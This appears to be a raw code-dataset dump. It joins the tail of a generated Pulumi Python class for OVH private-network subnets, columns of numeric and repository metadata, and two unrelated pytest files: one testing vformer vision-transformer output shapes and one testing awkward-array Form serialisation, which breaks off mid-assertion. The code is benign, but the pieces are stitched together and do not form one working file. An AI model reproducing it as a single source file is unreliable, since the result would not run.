:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]] ip_pools: List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PubicCloudPrivateNetworkSubnetState.__new__(_PubicCloudPrivateNetworkSubnetState)
__props__.__dict__["cidr"] = cidr
__props__.__dict__["dhcp"] = dhcp
__props__.__dict__["end"] = end
__props__.__dict__["gateway_ip"] = gateway_ip
__props__.__dict__["ip_pools"] = ip_pools
__props__.__dict__["network"] = network
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_gateway"] = no_gateway
__props__.__dict__["project_id"] = project_id
__props__.__dict__["region"] = region
__props__.__dict__["start"] = start
return PubicCloudPrivateNetworkSubnet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def cidr(self) -> pulumi.Output[str]:
"""
Ip Block representing the subnet cidr.
"""
return pulumi.get(self, "cidr")
@property
@pulumi.getter
def dhcp(self) -> pulumi.Output[Optional[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
_
"""
return pulumi.get(self, "dhcp")
@property
@pulumi.getter
def end(self) -> pulumi.Output[str]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@property
@pulumi.getter(name="gatewayIp")
def gateway_ip(self) -> pulumi.Output[str]:
"""
The IP of the gateway
"""
return pulumi.get(self, "gateway_ip")
@property
@pulumi.getter(name="ipPools")
def ip_pools(self) -> pulumi.Output[Sequence['outputs.PubicCloudPrivateNetworkSubnetIpPool']]:
"""
List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
"""
return pulumi.get(self, "ip_pools")
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Output[str]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> pulumi.Output[Optional[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def start(self) -> pulumi.Output[str]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
| 40.352941
| 165
| 0.615978
| 3,317
| 28,126
| 5.04703
| 0.058788
| 0.086733
| 0.076937
| 0.057822
| 0.847381
| 0.814587
| 0.790574
| 0.750075
| 0.739024
| 0.717042
| 0
| 0.00527
| 0.284897
| 28,126
| 696
| 166
| 40.41092
| 0.827077
| 0.367418
| 0
| 0.62931
| 1
| 0
| 0.094267
| 0.023583
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16092
| false
| 0.002874
| 0.020115
| 0
| 0.278736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d0b2bd7ed4da81908d0eadab0142ce1d50cf9fd
| 11,722
|
py
|
Python
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 90
|
2021-09-08T10:21:19.000Z
|
2022-03-26T18:11:47.000Z
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 72
|
2021-09-09T06:54:50.000Z
|
2022-03-31T09:23:31.000Z
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 21
|
2021-09-09T05:56:03.000Z
|
2022-03-20T08:22:09.000Z
|
import torch
import torch.nn as nn
from vformer.utils import MODEL_REGISTRY
models = MODEL_REGISTRY.get_list()
img_3channels_256 = torch.randn(2, 3, 256, 256)
img_3channels_224 = torch.randn(4, 3, 224, 224)
img_1channels_224 = torch.randn(2, 1, 224, 224)
def test_VanillaViT():
model = MODEL_REGISTRY.get("VanillaViT")(
img_size=256, patch_size=32, n_classes=10, in_channels=3
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
model = MODEL_REGISTRY.get("VanillaViT")(
img_size=256,
patch_size=32,
n_classes=10,
embedding_dim=1024,
decoder_config=(1024, 512),
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
def test_SwinTransformer():
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=1000,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
mlp_ratio=4.0,
qkv_bias=True,
qk_scale=None,
p_dropout=0.0,
attn_dropout=0.0,
drop_path_rate=0.1,
norm_layer=nn.LayerNorm,
ape=False,
patch_norm=True,
)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
# tiny_patch4_window7_224
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
# tiny_c24_patch4_window8_256
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=256,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[4, 8, 16, 32],
window_size=8,
p_dropout=0.2,
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
# for greyscale image
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=1,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
)
out = model(img_1channels_224)
assert out.shape == (2, 10)
del model
# testing for decoder_config parameter
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
decoder_config=(768, 256, 10, 2),
)
out = model(img_3channels_224)
del model
assert out.shape == (4, 10)
# ape=false
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
decoder_config=(768, 256, 10, 2),
ape=False,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
def test_CrossVit():
model = MODEL_REGISTRY.get("CrossViT")(256, 16, 64, 10)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
model = MODEL_REGISTRY.get("CrossViT")(
256,
16,
64,
10,
decoder_config_s=(1024, 256, 10),
decoder_config_l=(1024, 256, 10),
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
def test_pvt():
# classification
model = MODEL_REGISTRY.get("PVTClassification")(
patch_size=[7, 3, 3, 3],
embed_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[2, 2, 2, 2],
sr_ratios=[8, 4, 2, 1],
decoder_config=[512, 10],
num_classes=10,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassification")(
patch_size=[7, 3, 3, 3],
embed_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[2, 2, 2, 2],
sr_ratios=[8, 4, 2, 1],
decoder_config=512,
num_classes=10,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(linear=False)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(num_classes=10)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(num_classes=10)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassification")(num_classes=12)
out = model(img_3channels_224)
assert out.shape == (4, 12)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(
embedding_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[3, 4, 6, 3],
sr_ratios=[8, 4, 2, 1],
linear=True,
)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
# segmentation
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_224)
assert outs.shape == (
4,
1,
224,
224,
), f"expected: {(4,1,224,224)}, got : {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
), f"expected: {(4,1,256,256)}, got : {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
), f"expected: {(4,1,256,256)}, got : {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=False)
outs = model(img_3channels_224)
assert outs.shape == (
4,
1,
224,
224,
), f"expected: {(4,1,224,224)}, got : {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=True)
out = model(img_3channels_224)
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=False)
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
), f"expected: {(4,1,256,256)}, got : {outs.shape}"
del model
# detection
model = MODEL_REGISTRY.get("PVTDetection")()
outs = model(img_3channels_224)
del model
model = MODEL_REGISTRY.get("PVTDetectionV2")()
outs = model(img_3channels_224)
del model
def test_cvt():
model = MODEL_REGISTRY.get("CVT")(img_size=256, patch_size=4, in_channels=3)
out = model(img_3channels_256)
assert out.shape == (2, 1000)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
patch_size=4,
in_channels=3,
seq_pool=False,
embedding_dim=768,
num_heads=1,
mlp_ratio=4.0,
num_classes=10,
p_dropout=0.5,
attn_dropout=0.3,
drop_path=0.2,
positional_embedding="sine",
decoder_config=(768, 12024, 512, 256, 128, 64, 32),
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=False,
decoder_config=None,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=True,
decoder_config=768,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
def test_cct():
model = MODEL_REGISTRY.get("CCT")(img_size=256, patch_size=4, in_channels=3)
out = model(img_3channels_256)
assert out.shape == (2, 1000)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
patch_size=4,
in_channels=3,
seq_pool=False,
embedding_dim=768,
num_heads=1,
mlp_ratio=4.0,
num_classes=10,
p_dropout=0.5,
attn_dropout=0.3,
drop_path=0.2,
positional_embedding="sine",
decoder_config=(768, 12024, 512, 256, 128, 64, 32),
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=False,
decoder_config=None,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=True,
decoder_config=768,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
def test_visformer():
model = MODEL_REGISTRY.get("Visformer_S")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("Visformer_Ti")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("VisformerV2_S")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("VisformerV2_Ti")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
def test_dpt():
img = torch.randn(4, 3, 384, 384)
model = MODEL_REGISTRY.get("DPTDepth")(
"vitb16",
enable_attention_hooks=True,
)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitl16")
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitl16", invert=True, readout="ignore")
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitb16", invert=True, readout="add")
del model
"""
only initialisation of large models; no forward pass here because these models are
very large and github CI pipeline wont be able to handle them.
forward pass will be done on vit tiny model.
"""
model = MODEL_REGISTRY.get("DPTDepth")(
"vit_tiny", enable_attention_hooks=True, channels_last=True
)
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vit_tiny", invert=True, readout="ignore")
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vit_tiny", readout="add", use_bn=True)
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")(
"vit_tiny",
readout="add",
use_bn=True,
)
out = model(img)
assert out.shape == (4, 384, 384)
del model
| 25.262931
| 86
| 0.587186
| 1,577
| 11,722
| 4.164236
| 0.105263
| 0.112685
| 0.112076
| 0.143901
| 0.849094
| 0.837216
| 0.817116
| 0.776763
| 0.755901
| 0.735039
| 0
| 0.109121
| 0.285446
| 11,722
| 463
| 87
| 25.317495
| 0.674904
| 0.013308
| 0
| 0.776923
| 0
| 0
| 0.073966
| 0
| 0
| 0
| 0
| 0
| 0.097436
| 1
| 0.020513
| false
| 0
| 0.007692
| 0
| 0.028205
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d6d66b694c95f4ae35277457b87db6a0c795a2f
| 31,658
|
py
|
Python
|
tests/test_0057-virtual-array.py
|
colesbury/awkward-1.0
|
d036ab18eb54de8a2571d9f179d315ac8ee22119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0057-virtual-array.py
|
colesbury/awkward-1.0
|
d036ab18eb54de8a2571d9f179d315ac8ee22119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0057-virtual-array.py
|
colesbury/awkward-1.0
|
d036ab18eb54de8a2571d9f179d315ac8ee22119
|
[
"BSD-3-Clause"
] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
import json
import pickle
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
def test_forms():
form = ak.forms.NumpyForm([], 8, "d")
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.inner_shape == []
assert form.itemsize == 8
assert form.primitive == "float64"
assert form.has_identities is False
assert form.parameters == {}
assert form.form_key is None
assert json.loads(form.tojson(False, True)) == {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
form = ak.forms.NumpyForm(
[1, 2, 3],
8,
"d",
has_identities=True,
parameters={"hey": ["you", {"there": 3}]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.inner_shape == [1, 2, 3]
assert form.itemsize == 8
assert form.primitive == "float64"
assert form.has_identities is True
assert form.parameters == {"hey": ["you", {"there": 3}]}
assert form.parameter("hey") == ["you", {"there": 3}]
assert form.form_key == "yowzers"
assert json.loads(form.tojson(False, True)) == {
"class": "NumpyArray",
"inner_shape": [1, 2, 3],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": True,
"parameters": {"hey": ["you", {"there": 3}]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "NumpyArray",
"inner_shape": [1, 2, 3],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": True,
"parameters": {"hey": ["you", {"there": 3}]},
"form_key": "yowzers",
}
form = ak.forms.BitMaskedForm(
"i8",
ak.forms.NumpyForm([], 8, "d"),
True,
False,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "BitMaskedArray",
"mask": "i8",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"valid_when": True,
"lsb_order": False,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "BitMaskedArray",
"mask": "i8",
"content": "float64",
"valid_when": True,
"lsb_order": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.mask == "i8"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.valid_when is True
assert form.lsb_order is False
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ByteMaskedForm(
"i8",
ak.forms.NumpyForm([], 8, "d"),
True,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ByteMaskedArray",
"mask": "i8",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"valid_when": True,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ByteMaskedArray",
"mask": "i8",
"content": "float64",
"valid_when": True,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.mask == "i8"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.valid_when is True
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.EmptyForm(parameters={"hey": ["you"]}, form_key="yowzers")
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "EmptyArray",
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "EmptyArray",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.IndexedForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "IndexedArray64",
"index": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "IndexedArray64",
"index": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.index == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.IndexedOptionForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "IndexedOptionArray64",
"index": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "IndexedOptionArray64",
"index": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.index == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ListForm(
"i64",
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ListArray64",
"starts": "i64",
"stops": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ListArray64",
"starts": "i64",
"stops": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.starts == "i64"
assert form.stops == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ListOffsetForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ListOffsetArray64",
"offsets": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ListOffsetArray64",
"offsets": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.offsets == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RecordForm(
{"one": ak.forms.NumpyForm([], 8, "d"), "two": ak.forms.NumpyForm([], 1, "?")},
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RecordArray",
"contents": {
"one": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"two": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RecordArray",
"contents": {"one": "float64", "two": "bool"},
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert [json.loads(str(x)) for x in form.values()] == [
{
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert {n: json.loads(str(x)) for n, x in form.contents.items()} == {
"one": {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
"two": {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
},
}
assert json.loads(str(form.content("one"))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content("two"))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RecordForm(
[ak.forms.NumpyForm([], 8, "d"), ak.forms.NumpyForm([], 1, "?")],
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RecordArray",
"contents": [
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
],
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RecordArray",
"contents": ["float64", "bool"],
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert [json.loads(str(x)) for x in form.values()] == [
{"class": "NumpyArray", "itemsize": 8, "format": "d", "primitive": "float64"},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert {n: json.loads(str(x)) for n, x in form.contents.items()} == {
"0": {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
"1": {"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
}
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert json.loads(str(form.content("0"))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
